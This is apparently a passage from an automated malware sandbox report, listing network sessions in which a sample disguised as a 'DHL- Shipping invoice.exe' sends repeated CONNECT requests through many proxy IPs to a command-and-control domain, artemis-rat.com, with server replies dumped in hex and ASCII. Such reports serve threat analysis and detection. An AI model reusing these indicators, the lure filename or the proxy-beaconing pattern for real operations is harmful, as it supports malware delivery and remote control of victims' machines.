                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was una
                            Mar 12, 2024 08:37:29.048835993 CET372INData Raw: 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20
                            Data Ascii: ble to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this erro
                            Mar 12, 2024 08:37:29.476594925 CET372INData Raw: 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20
                            Data Ascii: ble to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this erro


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            889192.168.2.452479192.252.216.8141456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.511703968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            890192.168.2.45051650.63.13.3508876484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.512820005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562572956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563596010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            891192.168.2.45279631.43.158.10888886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.515189886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            892192.168.2.452789218.252.244.126806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.515604973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            893192.168.2.45278890.188.250.16806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.529791117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.829220057 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            894192.168.2.452786102.132.38.18780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.530771971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            895192.168.2.45278545.133.168.8280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.592535973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.944967985 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            896192.168.2.45280045.120.178.19710806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.592667103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.232104063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.918272018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            897192.168.2.452803185.162.60.680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.594737053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            898192.168.2.45281572.195.34.4141456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.595021009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            899192.168.2.452819174.75.211.22241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.595794916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            900192.168.2.4528265.161.103.113806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.601253986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            901192.168.2.452795171.250.221.19110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.606276035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            902192.168.2.45208298.188.47.15041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.606857061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            903192.168.2.452841172.67.181.11806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.611687899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.698894024 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            904192.168.2.452486185.212.60.62806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.613101959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.783507109 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            905192.168.2.452009148.72.206.84323476484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.619375944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.740751028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.815891027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.890434027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            906192.168.2.452813216.9.224.113806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.625860929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.823523998 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            907192.168.2.452793103.118.46.17780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.638930082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.004169941 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            908192.168.2.45287338.162.21.7131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.652282000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.950453043 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            909192.168.2.452208154.236.179.22919766484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.670578003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.740833998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.815891027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.890454054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.934529066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:39.046767950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:51.156054020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:15.156055927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:03.234153986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            910192.168.2.450614162.241.46.40643536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.672882080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.765641928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.859487057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.859628916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.859266043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:50.952960968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            911192.168.2.4505018.209.255.1331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.681109905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.745507956 CET38INHTTP/1.1 200 OK
                            content-length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            912192.168.2.452802123.126.158.50806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.688009024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            913192.168.2.45228012.186.205.123806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
